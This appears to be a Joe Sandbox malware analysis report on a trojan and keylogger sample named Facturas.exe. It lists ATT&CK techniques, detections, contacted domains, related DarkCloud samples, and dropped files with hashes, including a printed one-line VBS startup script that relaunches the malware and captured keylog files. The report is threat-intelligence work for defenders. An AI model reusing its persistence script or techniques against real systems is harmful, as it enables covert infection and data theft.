Gather Victim Identity Information	111 Scripting	Valid Accounts	1 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	12 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	12 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	21 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	12 Software Packing	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Facturas.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
Facturas.exe	100%	Avira	HEUR/AGEN.1310705
Facturas.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Id.exe	100%	Avira	HEUR/AGEN.1310705
C:\Users\user\AppData\Roaming\Id.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Id.exe	63%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
https://stackoverflow.com/q/14436606/23354	0%	URL Reputation	safe
https://stackoverflow.com/q/11564914/23354;	0%	URL Reputation	safe
https://stackoverflow.com/q/2152978/23354	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
showip.net	162.55.60.2	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://showip.netdD	InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1	InstallUtil.exe, 00000002.00000002.2482222234.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.00000000011DB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-neti	Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/14436606/23354	Facturas.exe, 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002B21000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/mgravell/protobuf-netJ	Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003D59000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://showip.netth?	InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://stackoverflow.com/q/11564914/23354;	Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://stackoverflow.com/q/2152978/23354	Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://showip.net/R	InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/mgravell/protobuf-net	Facturas.exe, 00000000.00000002.1260747588.0000000005B10000.00000004.08000000.00040000.00000000.sdmp, Id.exe, 0000000D.00000002.1411737595.0000000003B45000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://showip.net/Z	InstallUtil.exe, 00000002.00000002.2482222234.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Facturas.exe, 00000000.00000002.1248872319.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Facturas.exe, 00000000.00000002.1248872319.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Id.exe, 0000000D.00000002.1393116166.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://showip.net/g	InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.net/	InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.net/e1	InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.net	InstallUtil.exe, 00000002.00000002.2482222234.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://showip.nets	InstallUtil.exe, 0000000E.00000002.2483655901.000000000114B000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.55.60.2	showip.net	United States		35893	ACPCA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1541874
Start date and time:	2024-10-25 09:11:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Facturas.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/45@1/1
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 90% Number of executed functions: 150 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Facturas.exe, PID 7004 because it is empty
Execution Graph export aborted for target Id.exe, PID 7412 because it is empty
Execution Graph export aborted for target InstallUtil.exe, PID 5652 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Facturas.exe

Simulations

Behavior and APIs

Time	Type	Description
04:32:11	API Interceptor	26650x Sleep call for process: InstallUtil.exe modified
09:12:06	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.55.60.2	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Payment-Inv.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	QmBe2eUtqs.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	z10RFQ-202401.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	PROFORMA INVOICE.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	BANK STATEMENT REPORT.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	QOaboeP8al.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	Request for Quotataion.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	copia de pago.pdf.exe	Get hash	malicious	DarkCloud	Browse	showip.net/
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	showip.net/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
showip.net	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Payment-Inv.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	QmBe2eUtqs.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	z10RFQ-202401.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	PROFORMA INVOICE.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	BANK STATEMENT REPORT.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	QOaboeP8al.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Request for Quotataion.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	copia de pago.pdf.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	PO4541 , PO4537.pdf.exe	Get hash	malicious	DarkCloud, PureLog Stealer	Browse	162.55.60.2

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ACPCA	3HOhJoCrj5.elf	Get hash	malicious	Unknown	Browse	162.52.209.80
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	162.49.88.99
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	162.32.169.44
	QUOTE2342534.exe	Get hash	malicious	FormBook	Browse	162.0.215.33
	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	162.36.150.140
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	162.10.235.95
	LlbpXphTu9.exe	Get hash	malicious	Unknown	Browse	162.0.211.143
	nCEnoU35Wv.elf	Get hash	malicious	Okiru	Browse	162.0.215.71
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	162.0.101.75

Process:	C:\Users\user\Desktop\Facturas.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1189888
Entropy (8bit):	7.989450017330232
Encrypted:	false
SSDEEP:	24576:Q3gloMD5gDOid37+m+SVAtekU8rEZLI9LM2++tbPw6OV283BoW3:QyCTr+0VcA3ZLI9LMZxjrRf3
MD5:	AF60907E3D43618D4DB0730AEF26E7DD
SHA1:	8AFC3704D1053147EF397913EE55125D7B5F5C27
SHA-256:	445B43C35311FCEBB9F753C4572BA882D23CB73BE51128F8FBB21C3AF60DB51E
SHA-512:	475F9BEBEA668BA633015B7E09AB48951A348EAF324B9F7E000096D16E18737BDAACD3FF8A63831119413C4242236FF35A41634BE66AF157B380D25A6355CC84
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...;..g.............................=... ...@....@.. ....................................`..................................=..J....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H........s...2......J...................................................(o...(T.....(.....~....-.r...p.....+.+.+......~....(....+.o....+.s....+..~......+.......+..+.rA..p~....+.t....(....+.o....+..>+......s....+...(....v+.+.rO..p+..+.o....+.(....+.....(......(.....0..s.......+5+:+?+D+I.-(+Gr...p+C.,.,..-..+?.H+>r...p(....,....6.2(....+.o....+.o....+.o ...+..+..+.(....+..+..+.&....,...-..........ff........(....>+......*s!...+..0..........8....8....8....8....{...

C:\Users\user\AppData\Roaming\Id.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Facturas.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Id.vbs

Download File

Process:	C:\Users\user\Desktop\Facturas.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.830728633038605
Encrypted:	false
SSDEEP:	3:FER/n0eFHHo0nacwREaKC5vdOn:FER/lFHIcNwiaZ5vdO
MD5:	7B4E05DF8E36C720E99DA83D6FA0B8C4
SHA1:	BA52CF68313B16CAC9089EC9F422990E1392CF0F
SHA-256:	BF3A70A18CDA3CFF56023F6A28795B79D722530154BD0C28686C8204D83A194C
SHA-512:	04093418CF36378270E13808A75305BD9EED6C3BD8A3C85F0AD379C05E218F7E6E9F7E614DDBA13460E7FFD2B86FFC9F7C79C4501D6C0701240A3C6AF7FC83EC
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Id.exe"""

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataAgrYXqvU.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.322604024477179
Encrypted:	false
SSDEEP:	6:tOrdpwDdpwDdpwDdpwDdpwiZwiZwiZwiZwiZwiZx:tQwTwTwTwTwYwYwYwYwYwYx
MD5:	A19FBA6E006D55C23DB9AFAEB11AD9EC
SHA1:	2DE1049B5C1CB9A39205F514F5FF5578F7C27902
SHA-256:	D3B1ADE64FA7D8E3178D4F45B3A4C324CDEDE6590EDC8DB700A53216F1DFBE90
SHA-512:	EB465A000A163349F474BFD2248A0FB66667224B847F5476C701618C61C7905B58C0B4FB143E9DC6268F4C201F45F8ACF04690D20821ACC7D18E6A72CD838A20
Malicious:	false
Preview:	..[03:13:41]<<Program Manager>>....[03:13:41]<<Program Manager>>....[03:13:41]<<Program Manager>>....[03:13:41]<<Program Manager>>....[03:13:41]<<Program Manager>>....[03:13:42]<<Program Manager>>....[03:13:42]<<Program Manager>>....[03:13:42]<<Program Manager>>....[03:13:42]<<Program Manager>>....[03:13:42]<<Program Manager>>....[03:13:42]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataBXpKTjRE.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.320895694920304
Encrypted:	false
SSDEEP:	12:txXwYXwYAwYAwYAwYAwYAwYAwYAwYQAdpwYQAdpwYQAdpx:torr5
MD5:	AD1D5EFCA6645FCC84B21DCC7CF042B1
SHA1:	2571E13A853883762364137128B47F7587ACD6DF
SHA-256:	4B8885481013D75C641749F2EDD05C434AD3C2FD2D001188DE01804D3C6F3712
SHA-512:	024D7DFF9F77AD92898E60ED39BC23B5FBF1BA698A3678A528360E03B7C4941D2270750E1EA7F27C3A1C623F7E2D62CDD49F078633C7EB03E4A9A14014668DBD
Malicious:	false
Preview:	..[03:13:53]<<Program Manager>>....[03:13:53]<<Program Manager>>....[03:13:54]<<Program Manager>>....[03:13:54]<<Program Manager>>....[03:13:54]<<Program Manager>>....[03:13:54]<<Program Manager>>....[03:13:54]<<Program Manager>>....[03:13:54]<<Program Manager>>....[03:13:54]<<Program Manager>>....[03:13:55]<<Program Manager>>....[03:13:55]<<Program Manager>>....[03:13:55]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataEHCgjwEU.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.24158905335049
Encrypted:	false
SSDEEP:	6:tOWU4fweU4fweGweGweGweGweGweGweGweGweWUNx:txfwMfwxwxwxwxwxwxwxwxwJUNx
MD5:	F3E7A59AA5E3D385FA6FA40E4ABEBD72
SHA1:	FE1D3BE118D411F607FF259268E87D038F7BA2FA
SHA-256:	4803698DD910648D6D3BB8BBCF8F0741A31D2EC1C9B3054A6D56CC5657C8417B
SHA-512:	1AC3979062D02297ADCBDACD4EAF68F877688BAEA758B4FFDA5CA70EC5A8AD6399390CC9B6588677DBBD48241151E78F53363B128DF30FE31E259FE5AF17A04F
Malicious:	false
Preview:	..[03:13:31]<<Program Manager>>....[03:13:31]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:32]<<Program Manager>>....[03:13:33]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataGBsLLrRN.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.357593390034075
Encrypted:	false
SSDEEP:	3:tORqE4kZqE4kZqE4kZqE4kZqE4kZqE4kZqE4kZqE4kZtZfE4kZtZfE4kZtZfE4F:tOMwkwkwkwkwkwkwkwZfwZfwZfx
MD5:	00415D89FCF76F09DA4F745F636CC5F7
SHA1:	4CCD35B96EB1817B2F81621D9D71B513C47325AA
SHA-256:	39593064C0D2A540C9B9D6824536734284A2EB4E6720F3FC6055B4A7521BC252
SHA-512:	CDD18534276B2842BCCF7EC6FE269015399137A4F8C142B04DEC3919222F2525969F35EABF9BA4802BB1BA2BFEBCA7E1924386E9EC48194A0C9486CB410202D4
Malicious:	false
Preview:	..[03:13:46]<<Program Manager>>....[03:13:46]<<Program Manager>>....[03:13:46]<<Program Manager>>....[03:13:46]<<Program Manager>>....[03:13:46]<<Program Manager>>....[03:13:46]<<Program Manager>>....[03:13:46]<<Program Manager>>....[03:13:46]<<Program Manager>>....[03:13:47]<<Program Manager>>....[03:13:47]<<Program Manager>>....[03:13:47]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataJIKawXjD.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.257626796456887
Encrypted:	false
SSDEEP:	3:tOV9E4kd9E4kd9E4kd9E4kd9E4kcVCKUE4kcVCKUE4kcVCKUE4kcVCKUE4kcVCK5:tO3wfwfwfwfwcswcswcswcswcswcsx
MD5:	0B08B574177F874684D6E4D5833C4617
SHA1:	9CE9F29287E201F412B29242B45FA05A6363FC9D
SHA-256:	B7146FBA26041A1DBEE7E84355C988DD7CBF01A7BFBDF84C922FB5E6A9AE538F
SHA-512:	A28A4FD4DE843AB257B48170F10528D1880A81E3BE7394C0C515EA26607C250539B024C6A68AA654B2FC9AD13FA993513C39377064208B89BF7B2C077BB5877F
Malicious:	false
Preview:	..[03:13:09]<<Program Manager>>....[03:13:09]<<Program Manager>>....[03:13:09]<<Program Manager>>....[03:13:09]<<Program Manager>>....[03:13:09]<<Program Manager>>....[03:13:10]<<Program Manager>>....[03:13:10]<<Program Manager>>....[03:13:10]<<Program Manager>>....[03:13:10]<<Program Manager>>....[03:13:10]<<Program Manager>>....[03:13:10]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataJaavKlQS.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.369572771702385
Encrypted:	false
SSDEEP:	6:tOawZZwZZwZZwZZwZZwZZwZZw2Zw2Zw2Zx:t1wZZwZZwZZwZZwZZwZZwZZw2Zw2Zw2L
MD5:	D5DD214C3D3C20CC2E58EDD8018D7D05
SHA1:	B2815552BE4E225B3C6E6D00C7784A90BB9B5307
SHA-256:	B42943836569C38524709D3399423AD0E6945E125CFBC3445B09BB15AE6A558D
SHA-512:	0EB7F300883A2F64A3BC10571D437A2EA93975D386190DE0BE05D124ED6FC67429A1706C0BA25C4D8BDB7ACFF23BF1945A36F21CF8CC96B1E6BDB9BB03C69066
Malicious:	false
Preview:	..[03:13:26]<<Program Manager>>....[03:13:27]<<Program Manager>>....[03:13:27]<<Program Manager>>....[03:13:27]<<Program Manager>>....[03:13:27]<<Program Manager>>....[03:13:27]<<Program Manager>>....[03:13:27]<<Program Manager>>....[03:13:27]<<Program Manager>>....[03:13:28]<<Program Manager>>....[03:13:28]<<Program Manager>>....[03:13:28]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataMwoscjvf.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.2771516283920965
Encrypted:	false
SSDEEP:	6:tOWyNweyNweyNweyNweyNweyNweyNwec4ndpwec4ndpwec4ndpwec4ndpx:tkwLwLwLwLwLwLwkndpwkndpwkndpwk5
MD5:	F13DBC0D7C98C5DD890893564377DD8D
SHA1:	A8829D8D9A33FDBC3C273817DBADF56A725946D4
SHA-256:	41833CA0A2C9F6397296C9D0760E27C2B95F160E5802DDE56523254B6DB1F1A5
SHA-512:	526C1DA949781B2E0A8D9182E1199015C20267E279E70C8AADE58DA6D7BE57E101B1683D17B3E85801413957CE7E36550FE5746BAAFDF8DEF4A0CF5A890CFEA1
Malicious:	false
Preview:	..[03:13:38]<<Program Manager>>....[03:13:38]<<Program Manager>>....[03:13:38]<<Program Manager>>....[03:13:38]<<Program Manager>>....[03:13:38]<<Program Manager>>....[03:13:38]<<Program Manager>>....[03:13:38]<<Program Manager>>....[03:13:39]<<Program Manager>>....[03:13:39]<<Program Manager>>....[03:13:39]<<Program Manager>>....[03:13:39]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataOkwBKOVT.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.268464046286318
Encrypted:	false
SSDEEP:	6:tO7wTwTwTwr4ZLZwr4ZLZwr4ZLZwr4ZLZwr4ZLZwr4ZLZwr4ZLZx:t0wTwTwTw4Nw4Nw4Nw4Nw4Nw4Nw4Nx
MD5:	BEB80AE83412EB609B0ECF5217FF5427
SHA1:	27D81E4FD4D07F3DC940AAEC436E0D6A0F662C2D
SHA-256:	96AA2E9145D6BA169C851F6570DB23A3F4E83B5F11904810291DD5FBB928BDF9
SHA-512:	D11CF8C68C8E481EA2425EAFD2C3B4215BF4CE1FAC50621B92B195EC4F3CBF0BAA00B0C92CB83AA0493FBF6FD93FC4D203656C82837EDD9E466F7B18F163EB6B
Malicious:	false
Preview:	..[03:14:00]<<Program Manager>>....[03:14:00]<<Program Manager>>....[03:14:00]<<Program Manager>>....[03:14:00]<<Program Manager>>....[03:14:01]<<Program Manager>>....[03:14:01]<<Program Manager>>....[03:14:01]<<Program Manager>>....[03:14:01]<<Program Manager>>....[03:14:01]<<Program Manager>>....[03:14:01]<<Program Manager>>....[03:14:01]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataQduyKGov.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.279177307317194
Encrypted:	false
SSDEEP:	3:tOXiIUE4kfiIUE4kfiIUE4kfeUE4kfeUE4kfeUE4kfeUE4kfeUE4kfeUE4kfeUEE:tOcw0w0wdwdwdwdwdwdwdwux
MD5:	1F789C1D6EC9AA29A59208D0021A01B5
SHA1:	B4DC5B788AF0E61C863F485FE0A10C55B15E3D4A
SHA-256:	7FFCA5A3C5B4C13FD46E65F0E9CA4FD6FFA2CCCD6E9CB7074B1F2B5D931AC891
SHA-512:	164DC1701605A3430919E32282F828F1F5C86A5037BB13392D6A5D0C4B97E0019888A73F215F2D11408F843CF5BBCB02F963D99D72C4F0F9779C993F21057601
Malicious:	false
Preview:	..[03:13:20]<<Program Manager>>....[03:13:20]<<Program Manager>>....[03:13:20]<<Program Manager>>....[03:13:21]<<Program Manager>>....[03:13:21]<<Program Manager>>....[03:13:21]<<Program Manager>>....[03:13:21]<<Program Manager>>....[03:13:21]<<Program Manager>>....[03:13:21]<<Program Manager>>....[03:13:21]<<Program Manager>>....[03:13:22]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataQeSjVzIZ.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.290447725353914
Encrypted:	false
SSDEEP:	12:tQwPwAZNwAZNwAZNwAZNwAZNwAZNwAZNwtwtwtx:tvZ7Z7Z7Z7Z7Z7Zc
MD5:	A32D4CD63DAF9EB9313008008F9E7C47
SHA1:	599488DF78E0DF213E45557CEB02D54DD8BD6420
SHA-256:	D1D050BEA06C8B990A903E35E7E0555DF81AF591D29DA7034978371B33EB7A11
SHA-512:	661F487A76126EECD1A9CDC280CB95A445A52B4D581EF905C5378163961E56B54C24BDD13F8C986245D9E07A37E922C4A312A384D33BA5D2E3E56C4D9DE9D861
Malicious:	false
Preview:	..[03:13:34]<<Program Manager>>....[03:13:34]<<Program Manager>>....[03:13:35]<<Program Manager>>....[03:13:35]<<Program Manager>>....[03:13:35]<<Program Manager>>....[03:13:35]<<Program Manager>>....[03:13:35]<<Program Manager>>....[03:13:35]<<Program Manager>>....[03:13:35]<<Program Manager>>....[03:13:36]<<Program Manager>>....[03:13:36]<<Program Manager>>....[03:13:36]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataQusNBrHR.txt

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.212072188676305
Encrypted:	false
SSDEEP:	6:tOWWUNweWUNweWUNweWUNweWUNweWUNweAweAweAweAweAx:tmUNwJUNwJUNwJUNwJUNwJUNwPwPwPwe
